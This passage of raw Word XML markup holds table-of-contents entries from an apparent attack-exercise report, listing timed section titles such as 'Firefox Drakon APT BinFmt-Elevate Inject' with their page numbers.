            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13:15 -- FiveDirections 2 -- Firefox BITS Micro APT</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600074 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68BCBDDA" w14:textId="59760DA1" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600075" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.4.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075 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>75</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BCC3D65" w14:textId="5BF4E878" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600076" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.4.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076 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>75</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="555C266E" w14:textId="46419288" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600077" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.4.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600077 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>75</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B3B2287" w14:textId="6D6347D1" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600078" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.5</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14:14 -- ClearScope ch64 -- Barephone Micro APT (Failed)</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600078 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>78</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="36A86358" w14:textId="21497C7F" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600079" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.5.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079 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>78</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74F7F9B0" w14:textId="14613C47" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600080" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.5.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080 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>78</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6832C328" w14:textId="146EA1AD" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600081" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.5.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Benign Activity</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600081 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>78</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E75B6DC" w14:textId="43CFD4F9" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600082" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.5.4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Benign Activity Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600082 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>78</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04F51441" w14:textId="3F68FB86" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600083" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.5.5</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600083 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>78</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4916BEAE" w14:textId="66E1FFF7" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600084" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.6</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>14:48 -- TA1 THEIA 1 -- Firefox Drakon APT BinFmt-Elevate Inject</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600084 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="089DF47A" w14:textId="164DCB4F" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600085" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.6.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085 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EB8A8F0" w14:textId="2EA75A36" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600086" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.6.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086 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D35D700" w14:textId="3BC35D15" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600087" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>8.6.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600087 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
